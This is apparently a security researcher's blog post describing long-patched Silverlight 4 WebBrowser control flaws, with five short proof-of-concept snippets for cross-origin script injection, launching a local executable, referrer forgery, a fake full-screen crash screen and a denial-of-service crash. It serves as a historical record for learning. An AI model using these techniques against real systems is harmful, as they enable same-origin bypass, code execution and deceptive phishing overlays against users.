Silverlight 4 WebOC: RCE, UXSS, Referrer Forgery, and More

A penetration test of Silverlight 4 uncovered a cluster of serious issues in the WebBrowser control (WebOC) that Silverlight exposed to web content. These ranged from cross-origin script injection to remote code execution. I documented five distinct proof-of-concept scenarios.

PoC I — UXSS via Navigate2 with javascript: URL

wbControl.Navigate2('javascript:alert(document.body.innerText)', 0, 'xdomIFrame');

PoC II — Local File Execution (RCE)

wbControl.Navigate2("file:///c:/windows/system32/calc.exe", "", "ANY_TARGET");

PoC III — Referrer Forgery

wbControl.Navigate2("http://victim.com/", 0, "target", 0,
    "Referer:http://www.trusted.com/");

PoC IV — Full-Screen Overlay via createPopup

var a = createPopup();
a.document.body.innerHTML = "<h1>Fake BSOD</h1>";
a.show(0, 0, screen.width, screen.height);

PoC V — DoS via InvokeScript

WBControl.InvokeScript(""); // Crash

The Navigate2 API in the WebOC did not apply the same security restrictions as a normal browser navigation. Passing a javascript: URL as the target navigated an IFrame in the hosting page with the script running in that IFrame’s security context, bypassing the same-origin policy. The file execution issue was even more direct — the WebOC would happily launch local executables when given a file:// path.

Found during my years at Microsoft (2006–2014). These bugs were patched long ago — shared here as a historical record for learning purposes.

Read other posts

< [Silverlight 4 Pentest I] :: [IE DoS — Destroy Cached Flash IFrame Document] >